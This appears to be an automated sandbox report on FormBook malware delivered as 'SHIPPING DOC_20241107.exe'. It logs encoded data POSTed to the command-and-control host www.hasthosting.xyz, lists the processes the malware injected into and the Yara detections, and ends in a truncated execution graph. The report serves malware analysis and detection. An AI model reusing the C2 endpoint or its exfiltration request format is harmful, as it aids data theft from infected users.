                                                                                                                            59192.168.2.2249220185.27.134.14480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:38.584611893 CET799OUTPOST /04fb/ HTTP/1.1
                                                                                                                            Host: www.hasthosting.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.hasthosting.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.hasthosting.xyz/04fb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 2b 4a 77 59 44 76 6d 79 7a 73 5a 67 6b 62 75 49 77 76 71 41 4f 58 48 54 30 43 6b 43 4a 6f 55 58 73 71 54 4f 2f 31 65 4f 30 53 69 72 75 72 64 46 53 6b 79 62 4d 63 38 78 41 61 75 6b 74 74 6c 31 46 79 37 46 51 45 61 48 54 2b 4d 77 36 51 42 4e 74 43 59 35 65 36 39 45 72 67 76 6a 38 74 59 46 4d 6b 65 78 74 57 67 4e 68 42 41 78 77 70 79 38 4c 62 53 35 65 38 73 75 4d 7a 49 2b 52 62 50 63 55 6e 66 6c 45 30 2f 66 4c 39 49 53 6c 50 6d 70 68 72 6b 49 76 52 75 32 45 61 51 70 31 5a 70 30 76 67 50 4b 63 70 59 34 52 44 4d 50 4a 57 59 78 65 47 4c 39 63 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=JB6K6oyIdLi5+JwYDvmyzsZgkbuIwvqAOXHT0CkCJoUXsqTO/1eO0SirurdFSkybMc8xAaukttl1Fy7FQEaHT+Mw6QBNtCY5e69Ergvj8tYFMkextWgNhBAxwpy8LbS5e8suMzI+RbPcUnflE0/fL9ISlPmphrkIvRu2EaQp1Zp0vgPKcpY4RDMPJWYxeGL9cQ==
                                                                                                                            Nov 7, 2024 10:53:39.405797005 CET688INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:39 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 31 62 65 0d 0a a1 10 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d0 7c bb f6 a9 b9 75 32 b3 86 a6 dd 03 37 05 8d 30 d1 54 cf fd e0 65 97 2f 06 9c f0 f3 bf cd 6c 60 03 9d cd 35 7b f6 27 48 3d 38 e6 d6 08 b4 4b 02 db 74 7a 68 d4 08 90 27 35 ed 19 66 13 e5 da 78 da 62 d4 0c 92 1b 37 15 9a b9 d4 6e 85 91 db 06 16 e0 8c 83 a7 97 da fa 21 97 04 71 4c 92 11 35 82 55 59 e7 0e 02 96 ac a5 19 27 e4 1f e2 a1 fb 9f 22 75 ed be 02 f2 0b d7 86 85 a7 17 6a 21 03 d8 35 96 d6 8d 83 03 29 1c fd 95 bf a7 7f b1 da 02 9c 6c b7 ea fb 48 47 a8 04 cb d4 01 c6 d4 43 5a fb 81 7d df fe da 87 21 71 21 04 19 6f ec 93 7f 39 c2 29 ae 30 26 e1 c5 c7 04 1a 05 19 5f 76 d5 1b 32 f9 5f ef 40 01 40 ff 81 3d 67 4c 2b 69 53 a9 b2 2c b7 a5 e4 c2 f0 82 f5 a5 d5 4c a6 ba c4 84 6a 9b b7 a5 28 ca d2 e4 ce 39 c1 4d 21 65 29 64 ca 64 ce 04 d3 a5 f4 22 1d 10 03 28 fe 4e 61 8c 96 c2 38 e9 75 aa 15 cf 58 e1 fb 79 56 72 21 dd 48 6a bb 32 db c6 4e 00 73 80 df de 3a d7 76 80 43 a4 61 82 5d 3f b9 78 8c ad 33 db ef 75 17 18 9a 53 45 35 21 21 ae 51 64 7e [TRUNCATED]
                                                                                                                            Data Ascii: 1be +t|u270Te/l`5{'H=8Ktzh'5fxb7n!qL5UY'"uj!5)lHGCZ}!q!o9)0&_v2_@@=gL+iS,Lj(9M!e)dd"(Na8uXyVr!Hj2Ns:vCa]?x3uSE5!!Qd~">1t0QNCk>8zWm7Y$-N&a]<1[F*=*E$f*Zd!1jjv0*F[*3 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            60192.168.2.2249221185.27.134.14480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:41.128685951 CET2472OUTPOST /04fb/ HTTP/1.1
                                                                                                                            Host: www.hasthosting.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.hasthosting.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.hasthosting.xyz/04fb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 6b 6f 41 59 50 6f 53 79 6e 38 5a 6a 72 37 75 49 2f 50 72 4a 4f 58 4c 54 30 47 30 72 4b 61 34 58 69 62 44 4f 2b 58 6d 4f 35 79 69 72 6d 4c 64 42 4b 45 79 42 4d 63 6f 54 41 66 4b 53 74 6f 31 31 58 44 72 46 41 79 75 41 63 75 4d 79 2b 51 42 4f 74 43 59 67 65 38 64 49 72 67 71 72 38 74 41 46 4d 53 4b 78 6d 47 67 4b 74 68 41 78 77 70 79 34 4c 62 53 46 65 38 46 7a 4d 79 51 58 52 6f 58 63 55 46 48 6c 47 54 4c 63 4a 39 49 65 6a 2f 6d 32 74 35 56 43 6d 78 6d 49 47 6f 51 67 30 39 31 41 70 48 32 4f 62 34 67 73 56 77 42 6d 49 6a 4e 5a 56 31 2b 42 41 33 68 4e 4e 4d 59 6d 4c 56 55 31 6d 56 79 32 6c 4b 5a 37 57 71 6c 7a 59 59 32 62 4c 57 68 55 58 36 6f 69 73 45 76 31 64 75 53 41 39 74 43 55 47 44 2f 49 42 70 5a 35 6a 51 58 49 68 32 47 67 75 59 43 31 73 6d 7a 36 31 51 44 4f 55 68 76 62 68 63 4b 39 32 2f 59 36 57 71 7a 66 62 30 6d 48 54 57 69 51 58 43 41 46 4d 45 49 54 73 57 42 4e 5a 47 48 44 43 74 47 42 61 62 56 49 35 6f 63 61 75 38 4e 59 6c 68 41 69 79 48 37 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=JB6K6oyIdLi5koAYPoSyn8Zjr7uI/PrJOXLT0G0rKa4XibDO+XmO5yirmLdBKEyBMcoTAfKSto11XDrFAyuAcuMy+QBOtCYge8dIrgqr8tAFMSKxmGgKthAxwpy4LbSFe8FzMyQXRoXcUFHlGTLcJ9Iej/m2t5VCmxmIGoQg091ApH2Ob4gsVwBmIjNZV1+BA3hNNMYmLVU1mVy2lKZ7WqlzYY2bLWhUX6oisEv1duSA9tCUGD/IBpZ5jQXIh2GguYC1smz61QDOUhvbhcK92/Y6Wqzfb0mHTWiQXCAFMEITsWBNZGHDCtGBabVI5ocau8NYlhAiyH7ZD/CAkHsYZtjt6cHJXQFYcVI4Cz0taPM+0EvEFvNtCMjqotnxouZoqBk6r2ScRXG5tbtba/4fjb59IfGTuxhfsRZPcxCD0fgbV/in2OxsFWFMU8geLr/+lTJSa8hza5EPTcqCglDDqXPBWNlDEq1KGODbEldnuUTQbLPZhvg7EfmpXUpAsFF+nZ68dJFwHA7Zsr/OohkRLfeHrljdQtaQrui24kPPfyTxUAgOu6N4C6+DEOmfNmg83uiAp8YvVqPuxIOBYi5DwIvUesX36qDqHahJlef088GgVf3dYYVWGEnrikxuXtWEN/gTv0PYaJtjCVlxlKtnQAD/PBzuM/SefBqfNTJHJozBI8t/WUzJdaVDTUsMK8V3ZWe5ISc/Mkes0zo7OORwVPLG1/vBIm5CwlFg49HwUEe2VduR3TOxjonn3cDk1CxWhDhnYlhMBiL3L5H0QGf4u5ksj2UQIn8aLMpJ9SdtWdl8SWqw6Ome2UYV0w4VrtRo6teK63teLdYK0/p0iUO8V9u1hp8YsyNMNjjTE4swvsofuQKj6AfPCHMlgZRSH7ZeMm0ocn5cspTcJ+SduURWLazbIx1WuGUA5JTpdiXsKurvHwbmomMWimMK5DUU4HFRZuacVzBYuLUNNLLyAf0go1vMV5EqiISLhacBHQCRX4Pid [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:53:41.136815071 CET1752OUTData Raw: 6c 6b 71 52 4b 71 6e 50 42 39 45 6c 2b 6e 6c 61 49 2f 46 42 42 44 64 43 30 44 58 44 68 49 35 6a 36 68 71 63 35 6c 68 7a 35 2f 39 63 67 56 47 6c 4b 6a 70 7a 6b 4e 34 36 62 73 53 78 49 79 6f 4f 36 57 47 50 7a 2f 43 48 58 44 66 67 73 54 55 45 6f 62
                                                                                                                            Data Ascii: lkqRKqnPB9El+nlaI/FBBDdC0DXDhI5j6hqc5lhz5/9cgVGlKjpzkN46bsSxIyoO6WGPz/CHXDfgsTUEobcBU2GiRoL1mbBWUIY7tIUwFy9exRLFBQTUrQ9YuL7XDZ2Oo00/jWI3cCXi7b+n847MUlrl7FKwHU3lDGRSuVnZ31ShxEg2Dvo/YbtlQlM+ITld062mRavKZna+AQBjz9URPWavR/hazPyJbKsSCBPuY/P1bgPPACL
                                                                                                                            Nov 7, 2024 10:53:41.947027922 CET688INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 31 62 65 0d 0a a1 10 1a 00 20 ff af a9 a7 2b 8f 74 c8 13 dd 10 d0 7c bb f6 a9 b9 75 32 b3 86 a6 dd 03 37 05 8d 30 d1 54 cf fd e0 65 97 2f 06 9c f0 f3 bf cd 6c 60 03 9d cd 35 7b f6 27 48 3d 38 e6 d6 08 b4 4b 02 db 74 7a 68 d4 08 90 27 35 ed 19 66 13 e5 da 78 da 62 d4 0c 92 1b 37 15 9a b9 d4 6e 85 91 db 06 16 e0 8c 83 a7 97 da fa 21 97 04 71 4c 92 11 35 82 55 59 e7 0e 02 96 ac a5 19 27 e4 1f e2 a1 fb 9f 22 75 ed be 02 f2 0b d7 86 85 a7 17 6a 21 03 d8 35 96 d6 8d 83 03 29 1c fd 95 bf a7 7f b1 da 02 9c 6c b7 ea fb 48 47 a8 04 cb d4 01 c6 d4 43 5a fb 81 7d df fe da 87 21 71 21 04 19 6f ec 93 7f 39 c2 29 ae 30 26 e1 c5 c7 04 1a 05 19 5f 76 d5 1b 32 f9 5f ef 40 01 40 ff 81 3d 67 4c 2b 69 53 a9 b2 2c b7 a5 e4 c2 f0 82 f5 a5 d5 4c a6 ba c4 84 6a 9b b7 a5 28 ca d2 e4 ce 39 c1 4d 21 65 29 64 ca 64 ce 04 d3 a5 f4 22 1d 10 03 28 fe 4e 61 8c 96 c2 38 e9 75 aa 15 cf 58 e1 fb 79 56 72 21 dd 48 6a bb 32 db c6 4e 00 73 80 df de 3a d7 76 80 43 a4 61 82 5d 3f b9 78 8c ad 33 db ef 75 17 18 9a 53 45 35 21 21 ae 51 64 7e [TRUNCATED]
                                                                                                                            Data Ascii: 1be +t|u270Te/l`5{'H=8Ktzh'5fxb7n!qL5UY'"uj!5)lHGCZ}!q!o9)0&_v2_@@=gL+iS,Lj(9M!e)dd"(Na8uXyVr!Hj2Ns:vCa]?x3uSE5!!Qd~">1t0QNCk>8zWm7Y$-N&a]<1[F*=*E$f*Zd!1jjv0*F[*3 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            61192.168.2.2249222185.27.134.14480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:43.667028904 CET533OUTGET /04fb/?mFptYb=EDSq5eKeQ/yn+NstHLyKrItwi72t2/2aV0X8lTwCWtszw4+D6CyS+H/PrcNES324cNMrQPmMtrZnBxvMQyG2MZhT0iJG1CcvdKppxy///uoLHwLjuGAXtCom68+z&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.hasthosting.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:53:44.473948002 CET1184INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:53:44 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 983
                                                                                                                            Connection: close
                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                            Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("a6343ccb98ce9fb0ba6153f7214689e0");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/yn+NstHLyKrItwi72t2/2aV0X8lTwCWtszw4+D6CyS+H/PrcNES324cNMrQPmMtrZnBxvMQyG2MZhT0iJG1CcvdKppxy///uoLHwLjuGAXtCom68+z&Vta=nFypuDtholF&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:04:49:41
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Users\user\Desktop\SHIPPING DOC_20241107.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:1'536'512 bytes
                                                                                                                            MD5 hash:6FC4F6B2894FA46C60C67D2B8DEFD64E
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:04:49:42
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"
                                                                                                                            Imagebase:0x860000
                                                                                                                            File size:20'992 bytes
                                                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.369018456.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.369105032.0000000002980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:04:49:44
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe"
                                                                                                                            Imagebase:0x1360000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.874128931.0000000004EC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:4
                                                                                                                            Start time:04:49:47
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                                                                            Imagebase:0x150000
                                                                                                                            File size:29'184 bytes
                                                                                                                            MD5 hash:3CA2BB895E204478C7A4C9BAF70970CE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.873918569.0000000000160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:5
                                                                                                                            Start time:04:49:59
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe"
                                                                                                                            Imagebase:0x1360000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:8
                                                                                                                            Start time:04:50:18
                                                                                                                            Start date:07/11/2024
                                                                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0xb30000
                                                                                                                            File size:517'064 bytes
                                                                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                              Signature Coverage:6.5%
                                                                                                                              Total number of Nodes:2000
                                                                                                                              Total number of Limit Nodes:114
                                                                                                                              execution_graph 98776 9be70b 98779 9bd260 98776->98779 98778 9be719 98780 9bd27d 98779->98780 98808 9bd4dd 98779->98808 98781 9f29ea 98780->98781 98782 9f2a39 98780->98782 98811 9bd2a4 98780->98811 98785 9f29ed 98781->98785 98793 9f2a08 98781->98793 98863 a2a4fb 256 API calls __cinit 98782->98863 98786 9f29f9 98785->98786 98785->98811 98861 a2ab0f 256 API calls 98786->98861 98790 9f2c0e 98790->98790 98791 9bd6ab 98791->98778 98792 9bd594 98856 9b8bb2 69 API calls 98792->98856 98793->98808 98862 a2afb7 256 API calls 3 library calls 98793->98862 98797 9bd5a3 98797->98778 98798 9f2b55 98871 a2a866 90 API calls 98798->98871 98808->98791 98872 a19ed4 90 API calls 4 library calls 98808->98872 98811->98791 98811->98792 98811->98798 98811->98808 98813 9ba000 98811->98813 98836 9b9f3a 98811->98836 98841 9d2ec0 98811->98841 98844 9b88a0 98811->98844 98851 9b86a2 69 API calls 98811->98851 98852 9b8620 98811->98852 98857 9b859a 69 API calls 98811->98857 98858 9bd0dc 256 API calls 98811->98858 98859 9bd060 90 API calls 98811->98859 98860 9bcedd 256 API calls 98811->98860 98864 9b8bb2 69 API calls 98811->98864 98865 9b9e9c 61 API calls Mailbox 98811->98865 98866 a06ae3 61 API calls 98811->98866 98867 9b81a7 98811->98867 98814 9ba01f 98813->98814 98829 9ba04d Mailbox 98813->98829 98873 9d0f36 98814->98873 98816 9bb5d5 98817 9b81a7 60 API calls 98816->98817 98828 9ba1b7 98817->98828 98818 9b77c7 60 API calls 98818->98829 98821 9d0f36 60 API calls Mailbox 98821->98829 98823 9f03ae 98885 a19ed4 90 API calls 4 library calls 98823->98885 98826 9b81a7 60 API calls 98826->98829 98827 9f03bd 98827->98811 98828->98811 98829->98816 98829->98818 98829->98821 98829->98823 98829->98826 98829->98828 98830 9d2ec0 68 API calls __cinit 98829->98830 98831 a071e5 60 API calls 98829->98831 98832 9f0d2f 98829->98832 98834 9bb5da 98829->98834 98835 9ba6ba 98829->98835 98883 9bca20 256 API calls 2 library calls 98829->98883 98884 9bba60 61 API calls Mailbox 98829->98884 98830->98829 98831->98829 98887 a19ed4 90 API calls 4 library calls 98832->98887 98888 a19ed4 90 API calls 4 library calls 98834->98888 98886 a19ed4 90 API calls 4 library calls 98835->98886 98837 9d0f36 Mailbox 60 API calls 98836->98837 98838 9b9f47 98837->98838 98839 9b9f56 98838->98839 98917 9b7f41 98838->98917 98839->98811 98921 9d2dc4 98841->98921 98843 9d2ecb 98843->98811 98845 9b88b3 98844->98845 98846 9b8a81 98844->98846 98850 9b88c4 98845->98850 99001 9b77c7 98845->99001 98846->98811 98849 9d2ec0 __cinit 68 API calls 98849->98850 98850->98811 98851->98811 98853 9b862b 98852->98853 98855 9b8652 98853->98855 99006 9b8b13 98853->99006 98855->98811 98856->98797 98857->98811 98858->98811 98859->98811 98860->98811 98861->98791 98862->98808 98863->98811 98864->98811 98865->98811 98866->98811 98868 9b81ba 98867->98868 98869 9b81b2 98867->98869 98868->98811 99025 9b80d7 60 API calls 2 library calls 98869->99025 98871->98808 98872->98790 98875 9d0f3e 98873->98875 98876 9d0f58 98875->98876 98878 9d0f5c std::exception::exception 98875->98878 98889 9d588c 98875->98889 98906 9d3521 DecodePointer 98875->98906 98876->98829 98907 9d871b RaiseException 98878->98907 98880 9d0f86 98908 9d8651 59 API calls _free 98880->98908 98882 9d0f98 98882->98829 98883->98829 98884->98829 98885->98827 98886->98828 98887->98834 98888->98828 98890 9d5907 98889->98890 98895 9d5898 98889->98895 98915 9d3521 DecodePointer 98890->98915 98892 9d58a3 98892->98895 98909 9da2eb 59 API calls __NMSG_WRITE 98892->98909 98910 9da348 59 API calls 6 library calls 98892->98910 98911 9d321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98892->98911 98893 9d590d 98916 9d8ca8 59 API calls __getptd_noexit 98893->98916 98895->98892 98897 9d58cb RtlAllocateHeap 98895->98897 98900 9d58f3 98895->98900 98904 9d58f1 98895->98904 98912 9d3521 DecodePointer 98895->98912 98897->98895 98899 9d58ff 98897->98899 98899->98875 98913 9d8ca8 59 API calls __getptd_noexit 98900->98913 98914 9d8ca8 59 API calls __getptd_noexit 98904->98914 98906->98875 98907->98880 98908->98882 98909->98892 98910->98892 98912->98895 98913->98904 98914->98899 98915->98893 98916->98899 98918 9b7f50 __NMSG_WRITE _memmove 98917->98918 98919 9d0f36 Mailbox 60 API calls 98918->98919 98920 9b7f8e 98919->98920 98920->98839 98922 9d2dd0 _wprintf 98921->98922 98929 9d3397 98922->98929 98928 9d2df7 _wprintf 98928->98843 98946 9d9d8b 98929->98946 98931 9d2dd9 98932 9d2e08 RtlDecodePointer DecodePointer 98931->98932 98933 9d2e35 98932->98933 98934 9d2de5 98932->98934 98933->98934 98994 9d8924 60 API calls ___crtsetenv 98933->98994 98943 9d2e02 98934->98943 98936 9d2e98 EncodePointer EncodePointer 98936->98934 98937 9d2e47 98937->98936 98938 9d2e6c 98937->98938 98995 9d89e4 62 API calls __realloc_crt 98937->98995 98938->98934 98941 9d2e86 EncodePointer 98938->98941 98996 9d89e4 62 API calls __realloc_crt 98938->98996 98941->98936 98942 9d2e80 98942->98934 98942->98941 98997 9d33a0 98943->98997 98947 9d9d9c 98946->98947 98948 9d9daf EnterCriticalSection 98946->98948 98953 9d9e13 98947->98953 98948->98931 98950 9d9da2 98950->98948 98977 9d3235 59 API calls 3 library calls 98950->98977 98954 9d9e1f _wprintf 98953->98954 98955 9d9e28 98954->98955 98956 9d9e40 98954->98956 98978 9da2eb 59 API calls __NMSG_WRITE 98955->98978 98965 9d9e61 _wprintf 98956->98965 98981 9d899d 59 API calls 2 library calls 98956->98981 98959 9d9e2d 98979 9da348 59 API calls 6 library calls 98959->98979 98961 